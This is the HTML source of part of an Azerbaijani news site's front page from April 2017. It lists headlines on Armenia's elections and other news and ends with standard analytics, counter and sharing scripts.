                <div class="media-heading"><a href="http://www.xebersaati.com/news/25649-ermenistan-bash-prokurorlugu-secki-menteqelerinde-rushvet-veriler-yenilenib/">Ermənistan baş prokurorluğu: Seçki məntəqələrində rüşvət verilər (YENİLƏNİB)</a></div>
                <small>2017-04-02 14:07 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 3</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/25648-ermenistanda-seckilere-hazirliq-zamani-yuzlerle-qanun-pozuntusu-ashkar-edilib/"><img class="media-object img-rounded" widht="75" height="45" src="http://cdn2.trend.az/media/pictures/2013/05/08/Yerevan_080513.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/25648-ermenistanda-seckilere-hazirliq-zamani-yuzlerle-qanun-pozuntusu-ashkar-edilib/">Ermənistanda seçkilərə hazırlıq zamanı yüzlərlə qanun pozuntusu aşkar edilib</a></div>
                <small>2017-04-02 13:53 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 3</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/25640-isvecde-mekteblilerin-oldugu-avtobus-qezaya-ugrayib-olen-ve-yaralananlar-var/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/april/02/big/isvec-qaza.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/25640-isvecde-mekteblilerin-oldugu-avtobus-qezaya-ugrayib-olen-ve-yaralananlar-var/">İsveçdə məktəblilərin olduğu avtobus qəzaya uğrayıb, ölən və yaralananlar var</a></div>
                <small>2017-04-02 13:38 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 7</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/25642-ermenistanda-secki-menteqesinde-dava-video/"><img class="media-object img-rounded" widht="75" height="45" src="http://oxu.azstatic.com/uploads/W1siZiIsIjIwMTcvMDQvMDIvMTMvMzEvMDgvMzcyL2FybWVuaWFfcG9saWNlXy5qcGciXSxbInAiLCJlbmNvZGUiLCJqcGciLCItcXVhbGl0eSA4MCJdLFsicCIsInRodW1iIiwiNjIweDQ2NVx1MDAzZSJdXQ?sha=78d6d361"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/25642-ermenistanda-secki-menteqesinde-dava-video/">Ermənistanda seçki məntəqəsində dava – VİDEO</a></div>
                <small>2017-04-02 13:30 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 6</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/25636-ermenistanda-secki-menteqesinde-dava-video/"><img class="media-object img-rounded" widht="75" height="45" src="http://cdn.trend.az/media/pictures/2016/06/04/armenia_police_040616.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/25636-ermenistanda-secki-menteqesinde-dava-video/">Ermənistanda seçki məntəqəsində dava (VİDEO)</a></div>
                <small>2017-04-02 13:23 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 3</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/25633-sarkisyan-sesvermede-cetin-veziyyete-dushdu-onun-biometrik-karti-taninmadi/"><img class="media-object img-rounded" widht="75" height="45" src="http://oxu.azstatic.com/uploads/W1siZiIsIjIwMTcvMDQvMDIvMTMvMTYvNDAvMjk3L3NhcmtzYW4uanBnIl0sWyJwIiwiZW5jb2RlIiwianBnIiwiLXF1YWxpdHkgODAiXSxbInAiLCJ0aHVtYiIsIjYyMHg0NjVcdTAwM2UiXV0?sha=d62c53ca"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/25633-sarkisyan-sesvermede-cetin-veziyyete-dushdu-onun-biometrik-karti-taninmadi/">Sarkisyan səsvermədə çətin vəziyyətə düşdü: Onun biometrik kartı tanınmadı</a></div>
                <small>2017-04-02 13:16 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 12</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/25630-millet-vekilleri-aprel-doyushleri-azerbaycanin-torpaqlarini-itirmesiyle-razilashacagi-barede-mifi-puca-cixardi/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/april/02/big/aprel-doyushu.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/25630-millet-vekilleri-aprel-doyushleri-azerbaycanin-torpaqlarini-itirmesiyle-razilashacagi-barede-mifi-puca-cixardi/">Millət vəkilləri: “Aprel döyüşləri Azərbaycanın torpaqlarını itirməsiylə razılaşacağı barədə mifi puça çıxardı”</a></div>
                <small>2017-04-02 13:04 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 18</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/25628-dubayda-tikilmekde-olan-goydelen-yanib-video/"><img class="media-object img-rounded" widht="75" height="45" src="http://oxu.azstatic.com/uploads/W1siZiIsIjIwMTcvMDQvMDIvMTIvNTYvMTkvNzI5L2R1YmF5LmpwZyJdLFsicCIsImVuY29kZSIsImpwZyIsIi1xdWFsaXR5IDgwIl0sWyJwIiwidGh1bWIiLCI2MjB4NDY1XHUwMDNlIl1d?sha=a8bf6982"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/25628-dubayda-tikilmekde-olan-goydelen-yanib-video/">Dubayda tikilməkdə olan göydələn yanıb – VİDEO</a></div>
                <small>2017-04-02 12:55 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 7</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/25621-absh-da-konsert-zamani-atesh-acilib-yaralilar-var/"><img class="media-object img-rounded" widht="75" height="45" src="http://az.apa.az/upload/images/news/2017/april/02/big/absh-atash.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/25621-absh-da-konsert-zamani-atesh-acilib-yaralilar-var/">ABŞ-da konsert zamanı atəş açılıb, yaralılar var</a></div>
                <small>2017-04-02 12:35 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 9</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/25624-ermeni-jurnalist-seckilerde-saxtakarliq-haqqinda-danishdi/"><img class="media-object img-rounded" widht="75" height="45" src="http://cdn.trend.az/media/pictures/2017/04/02/election_020417.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/25624-ermeni-jurnalist-seckilerde-saxtakarliq-haqqinda-danishdi/">Erməni jurnalist seçkilərdə saxtakarlıq haqqında danışdı</a></div>
                <small>2017-04-02 12:32 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 3</small>
              </div>
            </li><li class="media">
              <a class="pull-left" href="http://www.xebersaati.com/news/25618-sabah-bakida-14-bolgelerde-16-isti-olacaq/"><img class="media-object img-rounded" widht="75" height="45" src="http://cdn2.trend.az/media/pictures/2008/08/29/Sun_290808.jpg"></a>
              <div class="media-body">
                <div class="media-heading"><a href="http://www.xebersaati.com/news/25618-sabah-bakida-14-bolgelerde-16-isti-olacaq/">Sabah Bakıda 14°, bölgələrdə 16° isti olacaq</a></div>
                <small>2017-04-02 12:24 | <i class="fa fa-bar-chart" aria-hidden="true"></i> 3</small>
              </div>
            </li></ul></div>    </div><!-- row -->

    <footer>
    	<hr>
    	<p class="text-center"><small>Saytdakı materialların istifadəsi zamanı istinad edilməsi vacibdir. Məlumat internet səhifələrində istifadə edildikdə hiperlink vasitəsi ilə istinad mütləqdir.</small><br>Copyright © 2016 All rights reserved. </p>
    	<p class="text-center">
    	  <!--LiveInternet counter--><script type="text/javascript"><!--
          document.write("<img src='//counter.yadro.ru/hit?t29.3;r"+
          escape(document.referrer)+((typeof(screen)=="undefined")?"":
          ";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
          screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
          ";h"+escape(document.title.substring(0,80))+";"+Math.random()+
          "' alt='' title='LiveInternet: number of visitors and pageviews"+
          " is shown' "+
          "border='0' width='88' height='120'>")
          //--></script><!--/LiveInternet-->
          <img border=0 alt='ILK-10 Azeri Website Directory' src='http://www.ilk10.az/counter/count3.php?color=liliac&id=36590'>
    	</p>
    </footer>
    </div><!-- container -->
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.4/jquery.min.js"></script>
    <script type="text/javascript" src="js/bootstrap.min.js"></script>
    <script type="text/javascript">
    	$('.xeberMetni iframe').wrap('<div class="embed-responsive embed-responsive-16by9"></div>');
    	$(".embed-responsive").before('<div class="clearfix"></div>');$(".xeberMetni iframe").addClass('embed-responsive-item');
      var flag="false";
      $("#kategoriyalarButton").click(function(){
        if(flag=="false")
          {$('#kategoriyalar').show(200); flag="true"; $("#kategoriyalarButton button").html('Kategoriyaları gizlət <i class="fa fa-angle-double-up" aria-hidden="true"></i>');} 
        else 
          {$('#kategoriyalar').hide(200); flag="false"; $("#kategoriyalarButton button").html('Kategoriyaları göstər <i class="fa fa-angle-double-down" aria-hidden="true"></i>');}
        
      });
    </script>
    <!--Google Analytics-->
	  <script>
	    (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
	    (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
	    m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
	    })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

	    ga('create', 'UA-31581333-12', 'auto');
	    ga('send', 'pageview');

	  </script>
	  <!--Google Analytics-->
	  <script type="text/javascript" src="//s7.addthis.com/js/300/addthis_widget.js#pubid=ra-5709013e408ef89c"></script>
	  <script type="text/javascript">jQuery.ajax({type: "GET",url: "http://topmedia.az/click.php"});</script>
  </body>
</html>
